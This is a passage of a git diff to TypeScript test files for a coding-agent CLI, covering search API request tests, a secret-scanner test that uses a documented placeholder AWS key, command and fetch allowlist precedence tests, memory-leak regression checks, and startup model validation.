+    method: "POST",
+    headers: { "Content-Type": "application/json", "Authorization": "Bearer tvly-test-key" },
+    body: JSON.stringify({ query: "what is typescript", max_results: 10, search_depth: "basic", include_answer: true }),
+  });
+
+  const data = await response.json() as { answer?: string };
+
+  // Verify the answer is present
+  assert.equal(data.answer, "TypeScript is a typed superset of JavaScript that compiles to plain JavaScript.");
+
+  // Verify the request included include_answer
+  assert.equal(captured.body?.include_answer, true);
+
+  // The answer should flow to summaryText (not summarizerKey)
+  const summaryText = data.answer || undefined;
+  assert.ok(summaryText, "Answer should be truthy and used as summaryText");
 });
 
 // =============================================================================
@@ -305,40 +305,40 @@ test("freshness='week' maps to time_range='week' in Tavily request body", () =>
 // Test: Domain mapping — include_domains, not site: prefix
 // =============================================================================
 
-test("Tavily domain filter uses include_domains, not site: prefix in query", async () => {
+test("Tavily domain filter uses include_domains, not site: prefix in query", async (t) => {
   const origKey = process.env.TAVILY_API_KEY;
   process.env.TAVILY_API_KEY = "tvly-test-key";
 
   const { captured, restore } = mockFetch(makeTavilyResponse());
 
-  try {
-    // Simulate what executeTavilySearch builds for domain filtering
-    const domain = "example.com";
-    const query = "typescript tutorial";
-
-    const requestBody: Record<string, unknown> = {
-      query, // Note: NO site: prefix
-      max_results: 10,
-      search_depth: "basic",
-      include_domains: [domain],
-    };
-
-    await globalThis.fetch("https://api.tavily.com/search", {
-      method: "POST",
-      headers: { "Content-Type": "application/json", "Authorization": "Bearer tvly-test-key" },
-      body: JSON.stringify(requestBody),
-    });
-
-    // Verify domain passed as include_domains, not in query
-    assert.deepEqual(captured.body?.include_domains, ["example.com"]);
-    assert.equal(captured.body?.query, "typescript tutorial", "Query must NOT contain site: prefix for Tavily");
-    assert.ok(
-      !(captured.body?.query as string).includes("site:"),
-      "Query must not include site: prefix for Tavily path"
-    );
-  } finally {
+  t.after(() => {
     restore();
     if (origKey !== undefined) process.env.TAVILY_API_KEY = origKey;
     else delete process.env.TAVILY_API_KEY;
-  }
+  });
+
+  // Simulate what executeTavilySearch builds for domain filtering
+  const domain = "example.com";
+  const query = "typescript tutorial";
+
+  const requestBody: Record<string, unknown> = {
+    query, // Note: NO site: prefix
+    max_results: 10,
+    search_depth: "basic",
+    include_domains: [domain],
+  };
+
+  await globalThis.fetch("https://api.tavily.com/search", {
+    method: "POST",
+    headers: { "Content-Type": "application/json", "Authorization": "Bearer tvly-test-key" },
+    body: JSON.stringify(requestBody),
+  });
+
+  // Verify domain passed as include_domains, not in query
+  assert.deepEqual(captured.body?.include_domains, ["example.com"]);
+  assert.equal(captured.body?.query, "typescript tutorial", "Query must NOT contain site: prefix for Tavily");
+  assert.ok(
+    !(captured.body?.query as string).includes("site:"),
+    "Query must not include site: prefix for Tavily path"
+  );
 });
diff --git a/src/tests/secret-scan.test.ts b/src/tests/secret-scan.test.ts
index c4b446cd5..7ac9701f0 100644
--- a/src/tests/secret-scan.test.ts
+++ b/src/tests/secret-scan.test.ts
@@ -26,24 +26,24 @@ function scanContent(
   const dir = mkdtempSync(join(tmpdir(), "secret-scan-test-"));
   try {
     // Initialize a git repo so `git diff --cached` works
-    spawnSync("git", ["init"], { cwd: dir });
-    spawnSync("git", ["config", "user.email", "test@test.com"], { cwd: dir });
-    spawnSync("git", ["config", "user.name", "Test"], { cwd: dir });
+  spawnSync("git", ["init"], { cwd: dir });
+  spawnSync("git", ["config", "user.email", "test@test.com"], { cwd: dir });
+  spawnSync("git", ["config", "user.name", "Test"], { cwd: dir });
 
-    // Write and stage the file
-    const filePath = join(dir, filename);
-    const parentDir = join(dir, ...filename.split("/").slice(0, -1));
-    if (filename.includes("/")) {
-      mkdirSync(parentDir, { recursive: true });
-    }
-    writeFileSync(filePath, content);
-    spawnSync("git", ["add", filename], { cwd: dir });
+  // Write and stage the file
+  const filePath = join(dir, filename);
+  const parentDir = join(dir, ...filename.split("/").slice(0, -1));
+  if (filename.includes("/")) {
+    mkdirSync(parentDir, { recursive: true });
+  }
+  writeFileSync(filePath, content);
+  spawnSync("git", ["add", filename], { cwd: dir });
 
-    const result = spawnSync("bash", [scanScript], {
-      cwd: dir,
-      encoding: "utf-8",
-      env: { ...process.env, TERM: "dumb" },
-    });
+  const result = spawnSync("bash", [scanScript], {
+    cwd: dir,
+    encoding: "utf-8",
+    env: { ...process.env, TERM: "dumb" },
+  });
 
     return {
       status: result.status ?? 1,
@@ -153,19 +153,17 @@ test("skips package-lock.json", { skip: isWindows }, () => {
   assert.equal(result.status, 0, `should pass (lockfile skip): ${result.stdout}`);
 });
 
-test("reports no files cleanly", { skip: isWindows }, () => {
+test("reports no files cleanly", { skip: isWindows }, (t) => {
   const dir = mkdtempSync(join(tmpdir(), "secret-scan-empty-"));
-  try {
-    spawnSync("git", ["init"], { cwd: dir });
-    const result = spawnSync("bash", [scanScript], {
-      cwd: dir,
-      encoding: "utf-8",
-    });
-    assert.equal(result.status, 0);
-    assert.match(result.stdout, /no files to scan/);
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
+  t.after(() => { rmSync(dir, { recursive: true, force: true }); });
+
+  spawnSync("git", ["init"], { cwd: dir });
+  const result = spawnSync("bash", [scanScript], {
+    cwd: dir,
+    encoding: "utf-8",
+  });
+  assert.equal(result.status, 0);
+  assert.match(result.stdout, /no files to scan/);
 });
 
 // ── Multiple findings ────────────────────────────────────────────────
@@ -186,34 +184,32 @@ test("reports multiple secrets in one file", { skip: isWindows }, () => {
 
 // ── CI mode (--diff) ─────────────────────────────────────────────────
 
-test("CI mode scans diff against ref", { skip: isWindows }, () => {
+test("CI mode scans diff against ref", { skip: isWindows }, (t) => {
   const dir = mkdtempSync(join(tmpdir(), "secret-scan-ci-"));
-  try {
-    spawnSync("git", ["init"], { cwd: dir });
-    spawnSync("git", ["config", "user.email", "test@test.com"], { cwd: dir });
-    spawnSync("git", ["config", "user.name", "Test"], { cwd: dir });
+  t.after(() => { rmSync(dir, { recursive: true, force: true }); });
 
-    // Create initial commit
-    writeFileSync(join(dir, "clean.ts"), "const x = 1;");
-    spawnSync("git", ["add", "."], { cwd: dir });
-    spawnSync("git", ["commit", "-m", "init"], { cwd: dir });
+  spawnSync("git", ["init"], { cwd: dir });
+  spawnSync("git", ["config", "user.email", "test@test.com"], { cwd: dir });
+  spawnSync("git", ["config", "user.name", "Test"], { cwd: dir });
 
-    // Add a file with a secret on a new commit
-    writeFileSync(
-      join(dir, "leaked.ts"),
-      'const key = "AKIAIOSFODNN7EXAMPLE";',
-    );
-    spawnSync("git", ["add", "."], { cwd: dir });
-    spawnSync("git", ["commit", "-m", "add leak"], { cwd: dir });
+  // Create initial commit
+  writeFileSync(join(dir, "clean.ts"), "const x = 1;");
+  spawnSync("git", ["add", "."], { cwd: dir });
+  spawnSync("git", ["commit", "-m", "init"], { cwd: dir });
 
-    const result = spawnSync("bash", [scanScript, "--diff", "HEAD~1"], {
-      cwd: dir,
-      encoding: "utf-8",
-    });
+  // Add a file with a secret on a new commit
+  writeFileSync(
+    join(dir, "leaked.ts"),
+    'const key = "AKIAIOSFODNN7EXAMPLE";',
+  );
+  spawnSync("git", ["add", "."], { cwd: dir });
+  spawnSync("git", ["commit", "-m", "add leak"], { cwd: dir });
 
-    assert.equal(result.status, 1, `CI mode should detect: ${result.stdout}`);
-    assert.match(result.stdout, /AWS Access Key/);
-  } finally {
-    rmSync(dir, { recursive: true, force: true });
-  }
+  const result = spawnSync("bash", [scanScript, "--diff", "HEAD~1"], {
+    cwd: dir,
+    encoding: "utf-8",
+  });
+
+  assert.equal(result.status, 1, `CI mode should detect: ${result.stdout}`);
+  assert.match(result.stdout, /AWS Access Key/);
 });
diff --git a/src/tests/security-overrides.test.ts b/src/tests/security-overrides.test.ts
new file mode 100644
index 000000000..826065dbd
--- /dev/null
+++ b/src/tests/security-overrides.test.ts
@@ -0,0 +1,105 @@
+import { describe, it, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { SettingsManager, getAllowedCommandPrefixes, SAFE_COMMAND_PREFIXES, setAllowedCommandPrefixes } from "@gsd/pi-coding-agent";
+import { getFetchAllowedUrls, setFetchAllowedUrls } from "../resources/extensions/search-the-web/url-utils.ts";
+import { applySecurityOverrides } from "../security-overrides.ts";
+
+describe("applySecurityOverrides — env var and settings precedence", () => {
+  const savedEnv: Record<string, string | undefined> = {};
+
+  beforeEach(() => {
+    // Snapshot env vars we might touch
+    savedEnv.GSD_ALLOWED_COMMAND_PREFIXES = process.env.GSD_ALLOWED_COMMAND_PREFIXES;
+    savedEnv.GSD_FETCH_ALLOWED_URLS = process.env.GSD_FETCH_ALLOWED_URLS;
+    delete process.env.GSD_ALLOWED_COMMAND_PREFIXES;
+    delete process.env.GSD_FETCH_ALLOWED_URLS;
+
+    // Reset runtime state to defaults
+    setAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES);
+    setFetchAllowedUrls([]);
+  });
+
+  afterEach(() => {
+    // Restore env vars
+    for (const [key, val] of Object.entries(savedEnv)) {
+      if (val === undefined) {
+        delete process.env[key];
+      } else {
+        process.env[key] = val;
+      }
+    }
+    // Restore runtime defaults
+    setAllowedCommandPrefixes(SAFE_COMMAND_PREFIXES);
+    setFetchAllowedUrls([]);
+  });
+
+  // --- Command prefixes ---
+
+  it("applies command prefixes from settings when no env var is set", () => {
+    const sm = SettingsManager.inMemory({ allowedCommandPrefixes: ["sops", "doppler"] });
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getAllowedCommandPrefixes()], ["sops", "doppler"]);
+  });
+
+  it("env var overrides settings for command prefixes", () => {
+    process.env.GSD_ALLOWED_COMMAND_PREFIXES = "age,infisical";
+    const sm = SettingsManager.inMemory({ allowedCommandPrefixes: ["sops", "doppler"] });
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getAllowedCommandPrefixes()], ["age", "infisical"]);
+  });
+
+  it("empty env var does not override settings (falls through to settings)", () => {
+    process.env.GSD_ALLOWED_COMMAND_PREFIXES = "";
+    const sm = SettingsManager.inMemory({ allowedCommandPrefixes: ["sops"] });
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getAllowedCommandPrefixes()], ["sops"]);
+  });
+
+  it("env var with whitespace and trailing commas is trimmed correctly", () => {
+    process.env.GSD_ALLOWED_COMMAND_PREFIXES = " sops , doppler , , ";
+    const sm = SettingsManager.inMemory();
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getAllowedCommandPrefixes()], ["sops", "doppler"]);
+  });
+
+  it("keeps built-in defaults when neither env var nor settings are set", () => {
+    const sm = SettingsManager.inMemory();
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getAllowedCommandPrefixes()], [...SAFE_COMMAND_PREFIXES]);
+  });
+
+  // --- Fetch URL allowlist ---
+
+  it("applies fetch allowed URLs from settings when no env var is set", () => {
+    const sm = SettingsManager.inMemory({ fetchAllowedUrls: ["internal.co", "192.168.1.50"] });
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getFetchAllowedUrls()].sort(), ["192.168.1.50", "internal.co"]);
+  });
+
+  it("env var overrides settings for fetch allowed URLs", () => {
+    process.env.GSD_FETCH_ALLOWED_URLS = "my-docs.internal";
+    const sm = SettingsManager.inMemory({ fetchAllowedUrls: ["other.internal"] });
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getFetchAllowedUrls()], ["my-docs.internal"]);
+  });
+
+  it("empty env var does not override settings for fetch URLs", () => {
+    process.env.GSD_FETCH_ALLOWED_URLS = "";
+    const sm = SettingsManager.inMemory({ fetchAllowedUrls: ["docs.internal"] });
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getFetchAllowedUrls()], ["docs.internal"]);
+  });
+
+  it("env var with whitespace and trailing commas is trimmed correctly for URLs", () => {
+    process.env.GSD_FETCH_ALLOWED_URLS = " a.internal , b.internal , , ";
+    const sm = SettingsManager.inMemory();
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getFetchAllowedUrls()].sort(), ["a.internal", "b.internal"]);
+  });
+
+  it("keeps empty allowlist when neither env var nor settings are set", () => {
+    const sm = SettingsManager.inMemory();
+    applySecurityOverrides(sm);
+    assert.deepEqual([...getFetchAllowedUrls()], []);
+  });
+});
diff --git a/src/tests/session-memory-leaks.test.ts b/src/tests/session-memory-leaks.test.ts
new file mode 100644
index 000000000..17a3590bb
--- /dev/null
+++ b/src/tests/session-memory-leaks.test.ts
@@ -0,0 +1,144 @@
+/**
+ * Regression tests for CPU/memory leak fixes in long-running sessions.
+ *
+ * Structural tests that verify the fix patterns are present in source —
+ * NOT runtime integration tests. This approach is chosen because:
+ * - The leaks manifest over hours of real usage, not in unit test timescales
+ * - The fixes are defensive guards (caps, disposal, handler cleanup)
+ * - Structural verification catches regressions when code is refactored
+ */
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+// ── Helpers ──────────────────────────────────────────────────────────
+
+function readSource(relativePath: string): string {
+  return readFileSync(join(import.meta.dirname, "..", "..", relativePath), "utf-8");
+}
+
+function extractFunctionBody(src: string, name: string): string {
+  const fnStart = src.indexOf(name);
+  assert.ok(fnStart > -1, `${name} must exist in source`);
+  let depth = 0;
+  let fnEnd = -1;
+  for (let i = src.indexOf("{", fnStart); i < src.length; i++) {
+    if (src[i] === "{") depth++;
+    if (src[i] === "}") depth--;
+    if (depth === 0) { fnEnd = i; break; }
+  }
+  return src.slice(fnStart, fnEnd + 1);
+}
+
+// ── TUI render-skip ─────────────────────────────────────────────────
+
+test("Container caches render output for stable-reference comparison", () => {
+  const src = readSource("packages/pi-tui/src/tui.ts");
+  assert.ok(
+    src.includes("_prevRender"),
+    "Container must have _prevRender cache for render-skip optimization",
+  );
+});
+
+test("TUI skips post-processing when component output is unchanged", () => {
+  const src = readSource("packages/pi-tui/src/tui.ts");
+  assert.ok(
+    src.includes("_lastRenderedComponents"),
+    "TUI must track _lastRenderedComponents for reference-equality skip",
+  );
+});
+
+// ── Loader frame isolation ──────────────────────────────────────────
+
+test("Loader does not call setText on every spinner tick", () => {
+  const src = readSource("packages/pi-tui/src/components/loader.ts");
+  // The old pattern was: setText(`${frame} ${message}`) inside the interval
+  // The new pattern: only update Text when message changes, prepend frame in render()
+  assert.ok(
+    src.includes("_lastMessage"),
+    "Loader must track _lastMessage to avoid setText on every tick",
+  );
+  // Verify the interval does NOT call setText or updateDisplay
+  const intervalMatch = src.match(/setInterval\s*\(\s*\(\)\s*=>\s*\{([^}]+)\}/s);
+  assert.ok(intervalMatch, "Loader must have a setInterval callback");
+  const intervalBody = intervalMatch[1];
+  assert.ok(
+    !intervalBody.includes("setText") && !intervalBody.includes("updateDisplay"),
+    "Loader interval must NOT call setText or updateDisplay — " +
+    "frame rotation should only trigger requestRender()",
+  );
+});
+
+// ── Text cache guard ────────────────────────────────────────────────
+
+test("Text.setText returns early when text is unchanged", () => {
+  const src = readSource("packages/pi-tui/src/components/text.ts");
+  const setTextBody = extractFunctionBody(src, "setText(");
+  assert.ok(
+    setTextBody.includes("if (this.text === text) return"),
+    "setText must early-return when text is identical to prevent cache invalidation",
+  );
+});
+
+// ── Chat component cap ──────────────────────────────────────────────
+
+test("InteractiveMode caps rendered chat components", () => {
+  const src = readSource("packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts");
+  assert.ok(
+    src.includes("MAX_CHAT_COMPONENTS"),
+    "InteractiveMode must define MAX_CHAT_COMPONENTS to prevent unbounded growth",
+  );
+  assert.ok(
+    src.includes("trimChatHistory"),
+    "InteractiveMode must call trimChatHistory to enforce the cap",
+  );
+});
+
+// ── ToolExecution dispose ───────────────────────────────────────────
+
+test("ToolExecutionComponent has dispose() to clear heavy references", () => {
+  const src = readSource("packages/pi-coding-agent/src/modes/interactive/components/tool-execution.ts");
+  assert.ok(
+    src.includes("dispose()"),
+    "ToolExecutionComponent must have dispose() for GC of image maps, diff previews, etc.",
+  );
+});
+
+// ── Orphan process prevention ───────────────────────────────────────
+
+test("InteractiveMode kills descendant processes on shutdown", () => {
+  const src = readSource("packages/pi-coding-agent/src/modes/interactive/interactive-mode.ts");
+  assert.ok(
+    src.includes("listDescendants"),
+    "Shutdown must use listDescendants to find orphan child processes",
+  );
+  assert.ok(
+    src.includes("SIGTERM") && src.includes("SIGKILL"),
+    "Shutdown must send SIGTERM then SIGKILL to descendants",
+  );
+});
+
+// ── Signal handler accumulation ─────────────────────────────────────
+
+test("bg-shell removes signal handlers on session_shutdown", () => {
+  const src = readSource("src/resources/extensions/bg-shell/bg-shell-lifecycle.ts");
+  assert.ok(
+    src.includes('process.off("SIGTERM"') || src.includes("process.off('SIGTERM'"),
+    "session_shutdown must remove SIGTERM handler to prevent accumulation",
+  );
+  assert.ok(
+    src.includes('process.off("SIGINT"') || src.includes("process.off('SIGINT'"),
+    "session_shutdown must remove SIGINT handler to prevent accumulation",
+  );
+});
+
+// ── Alert queue cap ─────────────────────────────────────────────────
+
+test("pendingAlerts has a maximum size cap", () => {
+  const src = readSource("src/resources/extensions/bg-shell/process-manager.ts");
+  assert.ok(
+    src.includes("MAX_PENDING_ALERTS"),
+    "process-manager must cap pendingAlerts to prevent unbounded growth",
+  );
+});
diff --git a/src/tests/startup-model-validation.test.ts b/src/tests/startup-model-validation.test.ts
new file mode 100644
index 000000000..fc124a132
--- /dev/null
+++ b/src/tests/startup-model-validation.test.ts
@@ -0,0 +1,124 @@
+/**
+ * GSD-2 — Regression tests for startup model validation (#3534)
+ *
+ * Verifies that validateConfiguredModel() correctly handles extension-provided
+ * models and that stale model IDs (e.g. claude-opus-4-6[1m]) trigger fallback.
+ */
+
+import { describe, it, beforeEach } from "node:test";
+import assert from "node:assert/strict";
+import { validateConfiguredModel } from "../startup-model-validation.js";
+
+// ─── Helpers ────────────────────────────────────────────────────────────────
+
+interface MockModel {
+	provider: string;
+	id: string;
+}
+
+function createMockRegistry(allModels: MockModel[], availableModels?: MockModel[]) {
+	return {
+		getAll: () => allModels,
+		getAvailable: () => availableModels ?? allModels,
+	};
+}
+
+function createMockSettings(defaults: { provider?: string; model?: string; thinking?: "off" | "high" }) {
+	let currentProvider = defaults.provider;
+	let currentModel = defaults.model;
+	let currentThinking: "off" | "minimal" | "low" | "medium" | "high" | "xhigh" = defaults.thinking ?? "off";
+
+	return {
+		getDefaultProvider: () => currentProvider,
+		getDefaultModel: () => currentModel,
+		getDefaultThinkingLevel: () => currentThinking,
+		setDefaultModelAndProvider: (provider: string, modelId: string) => {
+			currentProvider = provider;
+			currentModel = modelId;
+		},
+		setDefaultThinkingLevel: (level: "off" | "minimal" | "low" | "medium" | "high" | "xhigh") => {
+			currentThinking = level;
+		},
+		// Expose for assertions
+		get _provider() { return currentProvider; },
+		get _model() { return currentModel; },
+		get _thinking() { return currentThinking; },
+	};
+}
+
+// ─── Tests ──────────────────────────────────────────────────────────────────
+
+describe("validateConfiguredModel — regression #3534", () => {
+	it("preserves valid extension-provided model without overwriting", () => {
+		// Simulate: user configured claude-code/claude-opus-4-6, extension has registered it
+		const registry = createMockRegistry([
+			{ provider: "claude-code", id: "claude-opus-4-6" },
+			{ provider: "google", id: "gemini-2.5-pro" },
+		]);
+		const settings = createMockSettings({ provider: "claude-code", model: "claude-opus-4-6" });
+
+		validateConfiguredModel(registry, settings);
+
+		// Should NOT have changed the settings — the model is valid
+		assert.equal(settings._provider, "claude-code");
+		assert.equal(settings._model, "claude-opus-4-6");
+	});
+
+	it("falls back when configured model ID does not exist in registry", () => {
+		// Simulate: user configured claude-opus-4-6[1m] but registry only has claude-opus-4-6
+		const registry = createMockRegistry([
+			{ provider: "anthropic", id: "claude-opus-4-6" },
+			{ provider: "google", id: "gemini-2.5-pro" },
+		]);
+		const settings = createMockSettings({ provider: "anthropic", model: "claude-opus-4-6[1m]" });
+
+		validateConfiguredModel(registry, settings);
+
+		// Should have replaced with a fallback — the [1m] variant doesn't exist
+		assert.notEqual(settings._model, "claude-opus-4-6[1m]");
+	});
+
+	it("does not fall back to google when anthropic models are available", () => {
+		// Simulate: stale setting triggers fallback, anthropic should be preferred over google
+		const registry = createMockRegistry([
+			{ provider: "anthropic", id: "claude-opus-4-6" },
+			{ provider: "google", id: "gemini-2.5-pro" },
+		]);
+		const settings = createMockSettings({ provider: "anthropic", model: "nonexistent-model" });
+
+		validateConfiguredModel(registry, settings);
+
+		// Should pick anthropic fallback, not google
+		assert.equal(settings._provider, "anthropic");
+		assert.equal(settings._model, "claude-opus-4-6");
+	});
+
+	it("resets thinking level when model is replaced", () => {
+		const registry = createMockRegistry([
+			{ provider: "anthropic", id: "claude-opus-4-6" },
+		]);
+		const settings = createMockSettings({
+			provider: "anthropic",
+			model: "nonexistent-model",
+			thinking: "high",
+		});
+
+		validateConfiguredModel(registry, settings);
+
+		assert.equal(settings._thinking, "off");
+	});
+
+	it("is a no-op when no model is configured at all", () => {
+		const registry = createMockRegistry([
+			{ provider: "anthropic", id: "claude-opus-4-6" },
+			{ provider: "google", id: "gemini-2.5-pro" },
+		]);
+		const settings = createMockSettings({ provider: undefined, model: undefined });
+
+		validateConfiguredModel(registry, settings);
+
+		// Should pick a fallback since nothing was configured
+		assert.ok(settings._provider);
+		assert.ok(settings._model);
+	});
+});
diff --git a/src/tests/startup-perf.test.ts b/src/tests/startup-perf.test.ts
new file mode 100644
index 000000000..cd97cc59a
--- /dev/null
+++ b/src/tests/startup-perf.test.ts
@@ -0,0 +1,160 @@
+import { describe, it, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import * as fs from "node:fs";
+import * as os from "node:os";
+import * as path from "node:path";
+
+// ─── Pre-compiled extension loading ──────────────────────────────────────────
+
+describe("pre-compiled extension loading", () => {
+	let tmpDir: string;
+
+	beforeEach(() => {
+		tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "precompiled-ext-"));
+	});
+
+	afterEach(() => {
+		try {
+			fs.rmSync(tmpDir, { recursive: true, force: true, maxRetries: 3 });
+		} catch {
+			// Ignore cleanup errors on Windows
+		}
+	});
+
+	it("prefers .js sibling over .ts when .js is newer", async () => {
+		// Create a .ts file
+		const tsPath = path.join(tmpDir, "ext.ts");
+		fs.writeFileSync(tsPath, `export default function ext() { return "ts"; }`);
+
+		// Create a .js file with a newer mtime
+		const jsPath = path.join(tmpDir, "ext.js");
+		fs.writeFileSync(jsPath, `export default function ext() { return "js"; }`);
+
+		// Make .js newer than .ts
+		const now = new Date();
+		const past = new Date(now.getTime() - 10_000);
+		fs.utimesSync(tsPath, past, past);
+		fs.utimesSync(jsPath, now, now);
+
+		const tsStat = fs.statSync(tsPath);
+		const jsStat = fs.statSync(jsPath);
+		assert.ok(jsStat.mtimeMs >= tsStat.mtimeMs, ".js should have matching or newer mtime");
+	});
+
+	it("falls back to .ts when no .js sibling exists", () => {
+		const tsPath = path.join(tmpDir, "ext.ts");
+		fs.writeFileSync(tsPath, `export default function ext() { return "ts"; }`);
+
+		const jsPath = path.join(tmpDir, "ext.js");
+		assert.ok(!fs.existsSync(jsPath), ".js should not exist");
+	});
+
+	it("falls back to .ts when .js is older", () => {
+		const tsPath = path.join(tmpDir, "ext.ts");
+		fs.writeFileSync(tsPath, `export default function ext() { return "ts"; }`);
+
+		const jsPath = path.join(tmpDir, "ext.js");
+		fs.writeFileSync(jsPath, `export default function ext() { return "js-stale"; }`);
+
+		// Make .ts newer
+		const now = new Date();
+		const past = new Date(now.getTime() - 10_000);
+		fs.utimesSync(jsPath, past, past);
+		fs.utimesSync(tsPath, now, now);
+
+		const tsStat = fs.statSync(tsPath);
+		const jsStat = fs.statSync(jsPath);
+		assert.ok(jsStat.mtimeMs < tsStat.mtimeMs, ".js should be older than .ts");
+	});
+});
+
+// ─── Batch directory discovery ───────────────────────────────────────────────
+
+describe("batch directory discovery", () => {
+	let tmpDir: string;
+
+	beforeEach(() => {
+		tmpDir = fs.mkdtempSync(path.join(os.tmpdir(), "batch-discover-"));
+	});
+
+	afterEach(() => {
+		try {
+			fs.rmSync(tmpDir, { recursive: true, force: true, maxRetries: 3 });
+		} catch {
+			// Ignore cleanup errors on Windows
+		}
+	});
+
+	it("single readdir discovers existing subdirectories", () => {
+		// Create some resource subdirectories
+		fs.mkdirSync(path.join(tmpDir, "extensions"));
+		fs.mkdirSync(path.join(tmpDir, "skills"));
+		// prompts and themes do NOT exist
+
+		const entries = fs.readdirSync(tmpDir, { withFileTypes: true });
+		const subdirs = new Set(
+			entries.filter((e) => e.isDirectory()).map((e) => e.name),
+		);
+
+		assert.ok(subdirs.has("extensions"));
+		assert.ok(subdirs.has("skills"));
+		assert.ok(!subdirs.has("prompts"));
+		assert.ok(!subdirs.has("themes"));
+	});
+
+	it("returns empty set for non-existent parent directory", () => {
+		const missing = path.join(tmpDir, "does-not-exist");
+		let subdirs = new Set<string>();
+		try {
+			const entries = fs.readdirSync(missing, { withFileTypes: true });
+			subdirs = new Set(
+				entries.filter((e) => e.isDirectory()).map((e) => e.name),
+			);
+		} catch {
+			subdirs = new Set();
+		}
+
+		assert.equal(subdirs.size, 0);
+	});
+});
+
+// ─── Node.js compile cache ──────────────────────────────────────────────────
+
+describe("Node.js compile cache env setup", () => {
+	it("NODE_COMPILE_CACHE is settable on Node 22+", () => {
+		const nodeVersion = parseInt(process.versions.node);
+		if (nodeVersion >= 22) {
+			// Verify the env var mechanism works (does not throw)
+			const original = process.env.NODE_COMPILE_CACHE;
+			try {
+				process.env.NODE_COMPILE_CACHE = path.join(os.tmpdir(), ".test-compile-cache");
+				assert.equal(
+					process.env.NODE_COMPILE_CACHE,
+					path.join(os.tmpdir(), ".test-compile-cache"),
+				);
+			} finally {
+				if (original === undefined) {
+					delete process.env.NODE_COMPILE_CACHE;
+				} else {
+					process.env.NODE_COMPILE_CACHE = original;
+				}
+			}
+		}
+	});
+
+	it("does not overwrite existing NODE_COMPILE_CACHE", () => {
+		const original = process.env.NODE_COMPILE_CACHE;
+		try {
+			process.env.NODE_COMPILE_CACHE = "/custom/cache";
+			// Simulate the ??= behavior from cli.ts
+			process.env.NODE_COMPILE_CACHE ??= "/should-not-overwrite";
+			assert.equal(process.env.NODE_COMPILE_CACHE, "/custom/cache");
+		} finally {
+			if (original === undefined) {
+				delete process.env.NODE_COMPILE_CACHE;
+			} else {
+				process.env.NODE_COMPILE_CACHE = original;
+			}
+		}
+	});
+});
diff --git a/src/tests/terminal-cmux.test.ts b/src/tests/terminal-cmux.test.ts
index 97e89d096..dadb3629f 100644
--- a/src/tests/terminal-cmux.test.ts
+++ b/src/tests/terminal-cmux.test.ts
@@ -8,7 +8,7 @@ test("isCmuxTerminal detects cmux env vars", () => {
   assert.equal(isCmuxTerminal({ TERM_PROGRAM: "ghostty" } as NodeJS.ProcessEnv), false);
 });
 
-test("detectCapabilities treats cmux as kitty-capable", () => {
+test("detectCapabilities treats cmux as kitty-capable", (t) => {
   const originalEnv = process.env;
   process.env = {
     ...originalEnv,
@@ -16,15 +16,15 @@ test("detectCapabilities treats cmux as kitty-capable", () => {
     CMUX_SURFACE_ID: "surface:2",
     TERM_PROGRAM: "ghostty",
   };
-  try {
-    resetCapabilitiesCache();
-    assert.deepEqual(detectCapabilities(), {
-      images: "kitty",
-      trueColor: true,
-      hyperlinks: true,
-    });
-  } finally {
+  t.after(() => {
     process.env = originalEnv;
     resetCapabilitiesCache();
-  }
+  });
+
+  resetCapabilitiesCache();
+  assert.deepEqual(detectCapabilities(), {
+    images: "kitty",
+    trueColor: true,
+    hyperlinks: true,
+  });
 });
diff --git a/src/tests/tool-bootstrap.test.ts b/src/tests/tool-bootstrap.test.ts
index ef5f20315..8a98fd068 100644
--- a/src/tests/tool-bootstrap.test.ts
+++ b/src/tests/tool-bootstrap.test.ts
@@ -16,18 +16,16 @@ function makeExecutable(dir: string, name: string, content = "#!/bin/sh\nexit 0\
   return file;
 }
 
-test("resolveToolFromPath finds fd via fdfind fallback", () => {
+test("resolveToolFromPath finds fd via fdfind fallback", (t) => {
   const tmp = mkdtempSync(join(tmpdir(), "gsd-tool-bootstrap-resolve-"));
-  try {
-    makeExecutable(tmp, "fdfind");
-    const resolved = resolveToolFromPath("fd", tmp);
-    assert.equal(resolved, join(tmp, "fdfind"));
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }); });
+
+  makeExecutable(tmp, "fdfind");
+  const resolved = resolveToolFromPath("fd", tmp);
+  assert.equal(resolved, join(tmp, "fdfind"));
 });
 
-test("ensureManagedTools provisions fd and rg into managed bin dir", () => {
+test("ensureManagedTools provisions fd and rg into managed bin dir", (t) => {
   const tmp = mkdtempSync(join(tmpdir(), "gsd-tool-bootstrap-provision-"));
   const sourceBin = join(tmp, "source-bin");
   const targetBin = join(tmp, "target-bin");
@@ -35,23 +33,21 @@ test("ensureManagedTools provisions fd and rg into managed bin dir", () => {
   mkdirSync(sourceBin, { recursive: true });
   mkdirSync(targetBin, { recursive: true });
 
-  try {
-    makeExecutable(sourceBin, "fdfind");
-    makeExecutable(sourceBin, "rg");
+  t.after(() => { rmSync(tmp, { recursive: true, force: true }); });
 
-    const provisioned = ensureManagedTools(targetBin, sourceBin);
+  makeExecutable(sourceBin, "fdfind");
+  makeExecutable(sourceBin, "rg");
 
-    assert.equal(provisioned.length, 2);
-    assert.ok(existsSync(join(targetBin, FD_TARGET)));
-    assert.ok(existsSync(join(targetBin, RG_TARGET)));
-    assert.ok(lstatSync(join(targetBin, FD_TARGET)).isSymbolicLink() || lstatSync(join(targetBin, FD_TARGET)).isFile());
-    assert.ok(lstatSync(join(targetBin, RG_TARGET)).isSymbolicLink() || lstatSync(join(targetBin, RG_TARGET)).isFile());
-  } finally {
-    rmSync(tmp, { recursive: true, force: true });
-  }
